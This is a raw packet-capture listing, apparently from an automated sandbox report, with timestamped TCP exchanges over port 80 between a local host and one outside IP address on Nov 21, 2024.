                                        Nov 21, 2024 20:00:50.181916952 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.181962967 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.182030916 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.182754993 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.182805061 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.182945967 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.183598042 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.183644056 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.183711052 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.184498072 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.184541941 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.184549093 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.185306072 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.185353994 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.185429096 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.231370926 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.257169962 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.257215977 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.257253885 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.257493019 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.257569075 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.257611990 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.258377075 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.258466959 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.258502007 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.259181023 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.309500933 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.345432997 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.345644951 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.345712900 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.345835924 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.345947981 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.346077919 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.346740007 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.346831083 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.346863985 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.347628117 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.347740889 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.347774029 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.348340034 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.348437071 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.348470926 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.349237919 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.349404097 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.349436045 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.350096941 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.350265026 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.350296974 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.350930929 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.351020098 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.351058960 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.351783037 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.351834059 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.351866007 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.352616072 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.352778912 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.352811098 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.353462934 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.353578091 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.353610039 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.354331017 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.354454041 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.354490042 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.355223894 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.355297089 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.355329037 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.356044054 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.356132984 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.356179953 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.356894016 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.356972933 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.357004881 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.357770920 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.357902050 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.357937098 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.358603954 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.358778000 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.358809948 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.359453917 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.359559059 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.359592915 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.360312939 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.360369921 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.360400915 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.361171007 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.361279964 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.361310959 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.361989975 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.362121105 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.362154961 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.362864017 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.362910986 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.362941027 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.363729000 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.363831997 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.363862991 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.364569902 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.364701986 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.364733934 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.365474939 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.365520954 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.365554094 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.366271019 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.366384029 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.366436005 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.367161989 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.367245913 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.367280960 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.367971897 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.368087053 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.368119001 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.368911982 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.368993998 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.369026899 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.369678020 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.369786978 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.369817972 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.370713949 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.370853901 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.370894909 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.371402025 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.371478081 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.371515036 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.372256041 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.372318983 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.372355938 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.373104095 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.373244047 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.373290062 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.373980045 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.374119997 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.374159098 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.374851942 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.374967098 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.375006914 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.375725031 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.375806093 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.375845909 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.376512051 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.376627922 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.376683950 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.377432108 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.377551079 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.377588034 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.378313065 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.378566027 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.378608942 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.379077911 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.379229069 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.379266977 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.379935026 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.380064964 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.380110979 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.380799055 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.380932093 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.380970001 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.381655931 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.381794930 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.381830931 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.382468939 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.382603884 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.382646084 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.383364916 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.383392096 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.383430958 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.384222031 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.384345055 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.384385109 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.385112047 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.385240078 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.385286093 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.385982990 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.386154890 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.386198044 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.386787891 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.387057066 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.387119055 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.458343029 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.458448887 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.458528042 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.458755970 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.458950996 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.458998919 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.459582090 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.459682941 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.459733963 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.460448980 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.512664080 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.546727896 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.546803951 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.546858072 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.546928883 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.547091007 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.547137022 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.547204971 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.548015118 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.548064947 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.548122883 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.548803091 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.548851013 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.548918962 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.549673080 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.549719095 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.549762011 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.550514936 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.550564051 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.550626993 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.551373959 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.551420927 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.551513910 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.552237034 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.552282095 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.552359104 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.553054094 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.553102016 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.553164959 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.553910971 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.553975105 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.554028988 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.554775000 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.554821014 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.554883957 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.555638075 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.555671930 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.555687904 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.556526899 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.556576967 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.556663990 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.557347059 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.557394028 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.557497978 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.558240891 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.558293104 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.558551073 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.559040070 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.559079885 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.559094906 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.559906006 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.559956074 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.559994936 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.560759068 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.560812950 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.560889006 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.561624050 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.561676979 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.561741114 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.562438965 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.562489986 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.562553883 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.563308001 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.563405991 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.563433886 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.564202070 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.564258099 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.564302921 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.564991951 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.565045118 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.565109968 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.565838099 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.565887928 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.566091061 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.566720009 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.566766024 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.566860914 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.567559004 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.567605019 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.567677975 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.568510056 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.568561077 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.568609953 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.569269896 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.569320917 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.569386959 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.570103884 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.570154905 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.570171118 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.570971012 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.571019888 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.571082115 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.571805000 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.571856022 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.571959972 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.572741032 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.572788954 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.572834969 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.573543072 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.573596001 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.573645115 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.574389935 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.574439049 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.574467897 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.575258017 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.575341940 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.575391054 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.576129913 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.576178074 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.576211929 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.576919079 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.576968908 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.577032089 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.577816963 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.577864885 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.577944040 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.578705072 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.578752041 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.578752995 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.579549074 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.579605103 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.579627037 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.580343008 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.580396891 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.580460072 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.581178904 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.581228971 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.581290960 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.582048893 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.582098007 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.582262993 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.582935095 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.582982063 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.582987070 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.583796978 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.583848000 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.583964109 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.584826946 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.584877014 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.584940910 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.585474968 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.585522890 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.585562944 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.586297035 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.586345911 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.586427927 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.587158918 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.587208986 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.587286949 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.587996006 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.588047981 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.588164091 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.637716055 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.659512997 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.659568071 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.659634113 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.659708977 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.659760952 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.659828901 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:50.660542965 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:50.660676956 CET8049909178.215.224.74192.168.2.4
